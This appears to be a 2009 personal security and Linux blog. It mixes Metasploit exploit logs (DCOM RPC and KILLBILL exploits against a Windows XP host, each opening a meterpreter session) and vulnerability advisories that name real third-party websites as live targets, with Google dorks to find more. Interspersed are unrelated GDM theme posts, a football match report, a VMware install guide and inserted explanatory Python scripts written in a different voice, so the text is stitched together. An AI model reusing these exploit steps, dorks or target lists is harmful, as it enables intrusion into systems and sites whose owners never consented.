Metasploit Proof of Concept [ Linux ]  

Saturday, June 27, 2009

This is an old exploit, but it still works.
I have tested it on the local area network here.
This exploit was tested on
Windows XP Service Pack 1.

[o] DCOM RPC Exploit (ms03_026_dcom)

# Description
This module exploits a stack overflow in the RPCSS service. This
vulnerability was originally found by the Last Stage of Delirium
research group and has been widely exploited ever since. This module
can exploit the English versions of Windows NT 4.0 SP3-6a, Windows
2000, Windows XP, and Windows 2003 all in one request :)


root@ubuntu:~# ping 172.16.1.31
PING 172.16.1.31 (172.16.1.31) 56(84) bytes of data.
64 bytes from 172.16.1.31: icmp_seq=1 ttl=128 time=2.09 ms
64 bytes from 172.16.1.31: icmp_seq=2 ttl=128 time=0.335 ms
64 bytes from 172.16.1.31: icmp_seq=3 ttl=128 time=0.342 ms
^C
--- 172.16.1.31 ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 2005ms
rtt min/avg/max/mdev = 0.335/0.922/2.091/0.826 ms

root@ubuntu:~# nmap -O -PN 172.16.1.31

Starting Nmap 4.62 ( http://nmap.org ) at 2009-06-21 09:56 WIT
Interesting ports on ******-******.kapukvalley.net (172.16.1.31):
Not shown: 1710 closed ports
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1025/tcp open NFS-or-IIS
5000/tcp open upnp
MAC Address: 00:1C:F0:5A:98:AF (D-Link)
Device type: general purpose
Running: Microsoft Windows 2000
OS details: Microsoft Windows 2000 SP0/SP1/SP2 or Windows XP SP0/SP1
Network Distance: 1 hop

OS detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1.860 seconds

root@ubuntu:~# cd /home/noge/pentest/metasploit/
root@ubuntu:/home/noge/pentest/metasploit# ./msfconsole



=[ msf v3.3-dev
+ -- --=[ 378 exploits - 234 payloads
+ -- --=[ 20 encoders - 7 nops
=[ 154 aux

msf > use windows/dcerpc/ms03_026_dcom
msf exploit(ms03_026_dcom) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp
msf exploit(ms03_026_dcom) > show options

Module options:

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST                   yes       The target address
   RPORT  135              yes       The target port


Payload options (windows/meterpreter/bind_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique: seh, thread, process
   LPORT     4444             yes       The local port
   RHOST                      no        The target address


Exploit target:

   Id  Name
   --  ----
   0   Windows NT SP3-6a/2000/XP/2003 Universal


msf exploit(ms03_026_dcom) > set RHOST 172.16.1.31
RHOST => 172.16.1.31
msf exploit(ms03_026_dcom) > set TARGET 0
TARGET => 0
msf exploit(ms03_026_dcom) > show options

Module options:

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST  172.16.1.31      yes       The target address
   RPORT  135              yes       The target port


Payload options (windows/meterpreter/bind_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique: seh, thread, process
   LPORT     4444             yes       The local port
   RHOST     172.16.1.31      no        The target address


Exploit target:

   Id  Name
   --  ----
   0   Windows NT SP3-6a/2000/XP/2003 Universal


msf exploit(ms03_026_dcom) > exploit

[*] Started bind handler
[*] Trying target Windows NT SP3-6a/2000/XP/2003 Universal...
[*] Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:172.16.1.31[135] ...
[*] Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:172.16.1.31[135] ...
[*] Sending exploit ...
[*] Transmitting intermediate stager for over-sized stage...(191 bytes)
[*] The DCERPC service did not reply to our request
[*] Sending stage (2650 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (75787 bytes)...
[*] Upload completed.
[*] Meterpreter session 1 opened (172.16.1.12:38423 -> 172.16.1.31:4444)

meterpreter > pwd
C:\WINDOWS\system32
meterpreter > sysinfo
Computer: ******-******
OS : Windows XP (Build 2600, Service Pack 1).
meterpreter >


=============================================================================================
=============================================================================================


[o] KILLBILL SMB Exploit (ms04_007_killbill)

# Description
This is an exploit for a previously undisclosed vulnerability in the
bit string decoding code in the Microsoft ASN.1 library. This
vulnerability is not related to the bit string vulnerability
described in eEye advisory AD20040210-2. Both vulnerabilities were
fixed in the MS04-007 patch. You are only allowed one attempt with
this vulnerability. If the payload fails to execute, the LSASS
system service will crash and the target system will automatically
reboot itself in 60 seconds. If the payload succeeds, the system
will no longer be able to process authentication requests, denying
all attempts to login through SMB or at the console. A reboot is
required to restore proper functioning of an exploited system. This
exploit has been successfully tested with the win32/*/reverse_tcp
payloads, however a few problems were encountered when using the
equivalent bind payloads. Your mileage may vary.


msf > use windows/smb/ms04_007_killbill
msf exploit(ms04_007_killbill) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp
msf exploit(ms04_007_killbill) > show options

Module options:

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   PROTO  smb              yes       Which protocol to use: http or smb
   RHOST                   yes       The target address
   RPORT  445              yes       Set the SMB service port


Payload options (windows/meterpreter/bind_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique: seh, thread, process
   LPORT     4444             yes       The local port
   RHOST                      no        The target address


Exploit target:

   Id  Name
   --  ----
   0   Windows 2000 SP2-SP4 + Windows XP SP0-SP1


msf exploit(ms04_007_killbill) > set RHOST 172.16.1.31
RHOST => 172.16.1.31
msf exploit(ms04_007_killbill) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Windows 2000 SP2-SP4 + Windows XP SP0-SP1


msf exploit(ms04_007_killbill) > set TARGET 0
TARGET => 0
msf exploit(ms04_007_killbill) > show options

Module options:

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   PROTO  smb              yes       Which protocol to use: http or smb
   RHOST  172.16.1.31      yes       The target address
   RPORT  445              yes       Set the SMB service port


Payload options (windows/meterpreter/bind_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique: seh, thread, process
   LPORT     4444             yes       The local port
   RHOST     172.16.1.31      no        The target address


Exploit target:

   Id  Name
   --  ----
   0   Windows 2000 SP2-SP4 + Windows XP SP0-SP1


msf exploit(ms04_007_killbill) > exploit

[*] Started bind handler
[*] Error: The server responded with error: STATUS_ACCESS_VIOLATION (Command=115 WordCount=0)
[*] Transmitting intermediate stager for over-sized stage...(191 bytes)
[*] Sending stage (2650 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (75787 bytes)...
[*] Upload completed.
[*] Meterpreter session 3 opened (172.16.1.12:33484 -> 172.16.1.31:4444)

meterpreter > sysinfo
Computer: ******-******
OS : Windows XP (Build 2600, Service Pack 1).
meterpreter >



2BGal 3.1.2 phpinfo() Disclosure Vuln  

Thursday, June 25, 2009

[o] 2BGal 3.1.2 phpinfo() Disclosure Vulnerability
Software : 2BGal version 3.1.2
Vendor : http://www.ben3w.com/
Download : http://www.ben3w.com/multimedia/devphp_2bgal.php

Author : NoGe

[o] Vulnerable file
admin/phpinfo.php

[o] Exploit
http://localhost/[path]/admin/phpinfo.php

[o] Proof Of Concept
http://www.montefiore.ulg.ac.be/ieee/2bgal/admin/phpinfo.php
http://www.tavakathamritam.net/gallery/admin/phpinfo.php
http://www.bfloortheatre.com/photo/admin/phpinfo.php
http://sunnysidealpacaranch.ca/album/admin/phpinfo.php

[o] Dork
"powered by 2bgal"
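The advisory above is just a URL; what makes an exposed phpinfo() page worth reporting is what it hands out. The script below is an added example, not part of the original advisory and not 2BGal code: it detects phpinfo() markup and pulls out the entries an attacker reads first (PHP version, filesystem paths, loaded php.ini, and ini directives that widen the attack surface). The SAMPLE HTML is constructed to mirror phpinfo()'s layout; its values are invented and were not captured from any of the sites listed above. The fix on the application side is simply to delete admin/phpinfo.php or restrict it to authenticated administrators.

```python
"""Detect an exposed phpinfo() page and list what it discloses."""
import html
import re
import urllib.request

# phpinfo() renders each entry as <td class="e">name</td><td class="v">value</td>
ROW_RE = re.compile(r'<td class="e">(.*?)</td>\s*<td class="v">(.*?)</td>', re.S)
VERSION_RE = re.compile(r'<h1 class="p">PHP Version ([^<]+)</h1>')
TAG_RE = re.compile(r"<[^>]+>")

# Entries that leak deployment details an attacker builds on.
PATH_KEYS = ('System', 'Server API', 'Loaded Configuration File',
             '_SERVER["SERVER_SOFTWARE"]', '_SERVER["SERVER_ADMIN"]',
             '_SERVER["DOCUMENT_ROOT"]', '_SERVER["SCRIPT_FILENAME"]')
# directive -> value that weakens the deployment (local value column is checked)
WEAK_SETTINGS = {
    "allow_url_include": "On",
    "allow_url_fopen": "On",
    "register_globals": "On",
    "display_errors": "On",
    "magic_quotes_gpc": "Off",
    "open_basedir": "no value",
}


def _clean(cell):
    """Strip nested tags (phpinfo wraps 'no value' in <i>) and entities."""
    return html.unescape(TAG_RE.sub("", cell)).strip()


def is_phpinfo(page):
    return bool(VERSION_RE.search(page)) and 'class="e"' in page


def phpinfo_leaks(page):
    """Return version, paths, weak ini settings and disable_functions from phpinfo HTML."""
    rows = {_clean(name): _clean(value) for name, value in ROW_RE.findall(page)}
    m = VERSION_RE.search(page)
    return {
        "version": m.group(1).strip() if m else None,
        "paths": {k: rows[k] for k in PATH_KEYS if k in rows},
        "weak_settings": {k: rows[k] for k, bad in WEAK_SETTINGS.items()
                          if rows.get(k, "").lower() == bad.lower()},
        "disable_functions": rows.get("disable_functions", "no value"),
    }


def check_url(base_url, timeout=10.0):
    """Fetch <base>/admin/phpinfo.php (the 2BGal path above); None if it is not a phpinfo page."""
    url = base_url.rstrip("/") + "/admin/phpinfo.php"
    req = urllib.request.Request(url, headers={"User-Agent": "phpinfo-check"})
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        page = resp.read().decode("utf-8", "replace")
    return phpinfo_leaks(page) if is_phpinfo(page) else None


# Constructed sample in phpinfo() layout; every value below is invented for the demo.
SAMPLE = """<html><h1 class="p">PHP Version 5.2.6-2ubuntu4</h1>
<table><tr><td class="e">System </td><td class="v">Linux gallery 2.6.24-19-server i686 </td></tr>
<tr><td class="e">Loaded Configuration File </td><td class="v">/etc/php5/apache2/php.ini </td></tr>
<tr><td class="e">allow_url_include</td><td class="v">On</td><td class="v">Off</td></tr>
<tr><td class="e">register_globals</td><td class="v">On</td><td class="v">On</td></tr>
<tr><td class="e">display_errors</td><td class="v">Off</td><td class="v">Off</td></tr>
<tr><td class="e">open_basedir</td><td class="v"><i>no value</i></td><td class="v"><i>no value</i></td></tr>
<tr><td class="e">disable_functions</td><td class="v"><i>no value</i></td><td class="v"><i>no value</i></td></tr>
<tr><td class="e">_SERVER["DOCUMENT_ROOT"]</td><td class="v">/var/www/gallery </td></tr>
<tr><td class="e">_SERVER["SCRIPT_FILENAME"]</td><td class="v">/var/www/gallery/admin/phpinfo.php </td></tr>
</table></html>"""

if __name__ == "__main__":
    import json
    import sys
    if len(sys.argv) > 1:
        print(json.dumps(check_url(sys.argv[1]), indent=2))
    else:
        print(json.dumps(phpinfo_leaks(SAMPLE), indent=2))
```

With a base URL as the argument it requests the real page; without one it reports on the constructed sample. The script only reads what the server already publishes to anyone, which is the point of the finding.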



Think Ubuntu Ver 1.0 GDM Theme  

background 1600x1200

[o] download Think Ubuntu Ver 1.0

Do you think about Ubuntu? :D



Pelangi Ver 1.0 GDM Theme  

Thursday, June 18, 2009

Rainbow GDM theme (1024x768).
Background by seppoftw from DeviantArt.

[o] download Pelangi Version 1.0

[o] download the background here

If you have any opinion, please leave a comment.



enjoy the theme!! :)



Awan Biru Ver 1.0 GDM Theme  

Tuesday, June 16, 2009

Ubuntu GDM theme with a 1024x768 background.
Background created by LightDesgins from DeviantArt.

[o] download Awan Biru Version 1.0

[o] download the background here

hopefully you like it.. ^^



More GDM Themes  

Saturday, June 13, 2009

More GDM themes for Ubuntu.

[o] Absolut Hacker

gnome-look
ubuntu-art

[o] The Matrix

gnome-look
ubuntu-art

[o] Dinosaur

gnome-look
ubuntu-art

enjoy the theme!! ^^



Transformers GDM Theme Version 1.0  

Thursday, June 11, 2009

This is my first simple GDM theme for Ubuntu.
More GDM themes will be posted.

download the Transformers GDM Theme

How do you install it?

System >> Administration >> Login Window
Go to the Local tab.
Drag the .tar.gz file into the box and click Install,
or click + Add..., browse to the file and click Install.

Another way to install it:

Extract the .tar.gz file and copy the resulting directory into /usr/share/gdm/themes

i hope you like it.. enjoy the theme!! ^^



./NoGe



PERSIPURA JAYAPURA CHAMPION OF INDONESIAN SUPER LEAGUE  

Wednesday, June 10, 2009

Persipura Jayapura have confirmed their status as champions of the Indonesian
Super League (LSI) this season. And in no half measure: defending champions
Sriwijaya FC were beaten 4-1.

Not only that, Boaz, who scored twice, has for now taken over the top of the
scoring chart previously held by Cristian 'El Loco' Gonzales.
Boaz's tally now stands at 27, one goal ahead of El Loco.

Playing at Mandala Stadium, Jayapura, the Black Pearls (Tim Mutiara Hitam) looked
more at ease with the uneven pitch. The support of a crowd that filled the stadium
also made Boaz Sajojo Solossa and company play with more determination.

After creating several chances through Alberto 'Beto' Goncalves and
Boaz Solossa, the Black Pearls finally opened the scoring through Beto.
In the 23rd minute Persipura were awarded a penalty after a ball that Sriwijaya
defender Tsimi J Joel tried to head instead struck his hand.

Referee Yandri pointed straight to the spot. Although Boaz failed to convert the penalty,
Beto pounced on the loose ball and beat Ferry Rotinsulu.
1-0 to Persipura. The opening goal seemed to spur the Black Pearls on:
two fine chances created by Boaz and Beto threatened Ferry's goal.

Mandala Stadium roared again when Ernest Jeremiah doubled the lead
in the 38th minute. This time Beto was the creator, slipping the ball
to Ian Kabes, who was standing unmarked on the left of the Sriwijaya
defence. Kabes then fed Jeremiah, who calmly beat Ferry.

The 2-0 score held until half-time, although Sriwijaya had a chance
to reduce the deficit in the 41st minute.
Unfortunately, Ngon A Djam's free kick struck the post of the Persipura goal
guarded by Jendry Pitoy.

Into the second half, Persipura did not let up. Sriwijaya FC
actually had a chance to pull one back when they were awarded
a penalty in the 61st minute, but Ngon A Djam's kick was
saved by Jendry.

The second half turned out to belong to Boaz Sajojo Solossa.
In the 64th minute Boaz scored his first goal of the match,
meeting a perfect cross from Ian Kabes on the right of the Laskar Wong Kito defence
with a powerful header.

A 3-0 lead did not satisfy Persipura. Boaz beat Ferry Rotinsulu again
three minutes after his first goal, finishing Beto's pass into the penalty area
with a fierce shot to put the Black Pearls 4-0 up.

Sriwijaya could only reduce the deficit when substitute Budi
Sudarsono scored in the 86th minute. The 4-1 score
stood until the final whistle.
With this result Persipura close the season with a total of
80 points from 25 wins, 5 draws and only 4 defeats.

taken from http://bola.vivanews.com/news/read/65320-tekuk_sriwijaya__persipura_layak_juara



Sinojet SQL Injection Vuln  

Tuesday, June 9, 2009

[o] Sinojet SQL Injection Vulnerability
Software : Sinojet Script
Vendor : http://www.sinojet.net/

Author : NoGe

[o] Vulnerable file
product.php

[o] Exploit
http://localhost/[path]/product.php?id=[SQL]

[o] Proof Of Concept
http://www.wuzhoushanwang.com/en/product.php?id=1
http://www.guangchengal.com/en/product.php?id=9
http://www.gdtengfei.com/en/product.php?id=6

[o] Dork
"Powered by Sinojet"

[o] Note
Private shop script again. -_-
If there is no result, try injecting with schemafuzz. :)
Don't have schemafuzz? You can download it here.
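To show why a numeric id parameter passed straight into the query is enough for the product.php?id=[SQL] issue above, here is an added example. It is not Sinojet's code (a closed PHP script); the table, rows and the SQLite stand-in for MySQL are constructed for the demo. The vulnerable function concatenates the GET value into the query, the classic pattern behind this class of bug; the fixed one validates the type and binds the value. The UNION query in the test is the same technique that tools like schemafuzz automate against information_schema.

```python
"""Numeric SQL injection via product.php?id=, and the parameterised fix."""
import sqlite3


def make_db():
    """Constructed shop schema with one non-public product and an admin table."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE product (id INTEGER PRIMARY KEY, name TEXT, public INTEGER);
        INSERT INTO product VALUES (1, 'Widget', 1), (2, 'Gadget', 1), (3, 'Internal SKU', 0);
        CREATE TABLE admin (user TEXT, pass TEXT);
        INSERT INTO admin VALUES ('admin', 's3cret');
    """)
    return conn


def vulnerable_lookup(conn, id_param):
    """The bug: the raw GET value becomes part of the SQL text.

    id=1 OR 1=1 turns the WHERE into (public = 1 AND id = 1) OR 1=1 and lists
    every row; id=0 UNION SELECT user, pass FROM admin appends other tables.
    """
    sql = "SELECT id, name FROM product WHERE public = 1 AND id = " + id_param
    return conn.execute(sql).fetchall()


def safe_lookup(conn, id_param):
    """The fix: reject anything that is not an integer, then bind the value.

    Bound parameters are sent as data, so even a value that survived the
    int() check could never be interpreted as SQL.
    """
    try:
        product_id = int(id_param)
    except ValueError:
        raise ValueError("id must be an integer") from None
    return conn.execute(
        "SELECT id, name FROM product WHERE public = 1 AND id = ?", (product_id,)
    ).fetchall()


if __name__ == "__main__":
    db = make_db()
    for payload in ("2", "1 OR 1=1", "0 UNION SELECT user, pass FROM admin"):
        print("vulnerable", repr(payload), "->", vulnerable_lookup(db, payload))
        try:
            print("safe      ", repr(payload), "->", safe_lookup(db, payload))
        except ValueError as exc:
            print("safe      ", repr(payload), "->", exc)
```

The normal request (id=2) returns the same single row from both functions; only the hostile values differ, which is what makes this bug easy to miss in functional testing.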



How to install VMware Server on ubuntu 8.10  

Wednesday, June 3, 2009


First of all, download VMware Server from here; on that page click Download.
On the next page, if you already have a VMware account, log in with your email and password; if not, create one.
Just follow the instructions there. At the end you will receive an email with the download page link and the VMware license keys.
There are two license keys, one for Windows and one for Linux. Save the Linux key!
Then download the VMware Server package. Remember to download the TAR file, not the RPM file!

After the download, install the packages the VMware Server installer needs before running it.

# apt-get install linux-headers-`uname -r` build-essential xinetd

Now extract the VMware Server archive (in my case VMware Server 2.0.1):

# tar -zxvf VMware-server-2.0.1-156745.i386.tar.gz

Change into the vmware-server-distrib directory:

# cd vmware-server-distrib

Run the installer:

# ./vmware-install.pl

The installer asks a lot of questions; you can accept the default values by pressing ENTER,
or specify a location with enough free space to store your virtual machines.
At the end of the installation you will be asked to enter a serial number.

Please enter your 20-character serial number.

Type XXXXX-XXXXX-XXXXX-XXXXX or 'Enter' to cancel:

Fill in your VMware Server serial number and press ENTER.
After a successful installation you can delete the installation directory:

# rm -rf vmware-server-distrib

If you accepted all default values during the installation, root is now the VMware Server login name.
On Ubuntu the root account has no password by default, so set one with this command.
Note that this also enables logging in directly as root, which Ubuntu normally disables, so choose a strong password:

# passwd root
Enter new UNIX password:
Retype new UNIX password:
passwd: password updated successfully

You can access the management interface over HTTPS (https://<host>:8333) or HTTP (http://<host>:8222),
both locally and remotely. Prefer HTTPS: the HTTP port sends the root password in cleartext, which matters when you manage the server remotely.
From the same machine, type https://127.0.0.1:8333 or http://127.0.0.1:8222 into the browser address bar.
If you're using Firefox 3 over HTTPS, Firefox will complain about the self-signed certificate
and you must tell it to accept the certificate.

After you open https://127.0.0.1:8333 you will see an error message like this:

Secure Connection Failed

127.0.0.1:8333 uses an invalid security certificate.

The certificate is not trusted because it is self signed.
The certificate is only valid for ubuntu

(Error code: sec_error_ca_cert_invalid)

[...]

click Or you can add an exception...
click Add Exception...
click Get Certificate
click Confirm Security Exception

After that you will see the VMware Server login form. Type in root and your root password
and start configuring VMware Server!
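Clicking through the Firefox exception above trusts whatever certificate answered on port 8333; over a remote connection that could be anything sitting between you and the server. The script below is an added example, not part of the original post and not VMware tooling: it computes the SHA-256 fingerprint of the certificate the server should present and of the one actually presented, and opens a connection only when the two match. It assumes the self-signed certificate is at /etc/vmware/ssl/rui.crt (the VMware Server 2 default; adjust for your install) and that the UI listens on 8333 as described above. SAMPLE_DER is a constructed stand-in so the fingerprint helpers can be exercised without a real certificate.

```python
"""Fingerprint-check the VMware Server web UI certificate before trusting it."""
import hashlib
import socket
import ssl
import sys


def fingerprint_der(der_bytes):
    """SHA-256 fingerprint in the AA:BB:... form browsers display."""
    digest = hashlib.sha256(der_bytes).hexdigest().upper()
    return ":".join(digest[i:i + 2] for i in range(0, len(digest), 2))


def fingerprint_pem(pem_text):
    """Fingerprint of a PEM file such as the server's own rui.crt."""
    return fingerprint_der(ssl.PEM_cert_to_DER_cert(pem_text))


def fingerprints_match(a, b):
    """Compare ignoring colons and case so a value pasted from a dialog works."""
    return a.replace(":", "").lower() == b.replace(":", "").lower()


def _tls_connect_unverified(host, port, timeout):
    # No CA check: a self-signed cert can only be judged by its fingerprint,
    # which is exactly what the pin check below does.
    ctx = ssl.create_default_context()
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE
    raw = socket.create_connection((host, port), timeout=timeout)
    return ctx.wrap_socket(raw, server_hostname=host)


def presented_fingerprint(host, port=8333, timeout=5.0):
    """What the UI actually hands out over the network (network access required)."""
    with _tls_connect_unverified(host, port, timeout) as tls:
        return fingerprint_der(tls.getpeercert(binary_form=True))


def connect_pinned(host, expected_fp, port=8333, timeout=5.0):
    """Return a TLS socket only if the presented certificate matches the pin."""
    tls = _tls_connect_unverified(host, port, timeout)
    seen = fingerprint_der(tls.getpeercert(binary_form=True))
    if not fingerprints_match(seen, expected_fp):
        tls.close()
        raise ssl.SSLCertVerificationError(f"pin mismatch: got {seen}, expected {expected_fp}")
    return tls


# Constructed stand-in for DER bytes; not a real certificate, used only to exercise the helpers.
SAMPLE_DER = b"constructed-der-stand-in-for-the-demo"
SAMPLE_PEM = ssl.DER_cert_to_PEM_cert(SAMPLE_DER)

if __name__ == "__main__":
    host = sys.argv[1] if len(sys.argv) > 1 else "127.0.0.1"
    with open("/etc/vmware/ssl/rui.crt") as f:   # assumed VMware Server 2 default location
        expected = fingerprint_pem(f.read())
    seen = presented_fingerprint(host)
    print("rui.crt  :", expected)
    print("presented:", seen)
    print("MATCH" if fingerprints_match(expected, seen) else "MISMATCH - do not add the exception")
```

Run it on the server itself to get the rui.crt fingerprint, then compare that value with the certificate details Firefox shows in the exception dialog on the client before confirming the exception.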

[o] Documentation

http://google.co.id
http://howtoforge.com
http://vmware.com



./NoGe



Linux Download Link  

Tuesday, June 2, 2009


Indonesian Linux ISO and repository mirrors

ftp://dl2.foss-id.web.id/iso/

ftp://mirror.its.ac.id/ISO/

ftp://ftp.itb.ac.id/

http://ubuntu.pesat.net.id/

http://mirror.unej.ac.id/site/

http://ubuntu.biz.net.id/

http://kambing.ui.ac.id/iso/

http://repo.ugm.ac.id/iso/

http://jaran.undip.ac.id/iso/

http://kebo.vlsm.org/ISO/

http://komo.vlsm.org/




[d]esign by Amanda [e]dited by NoGe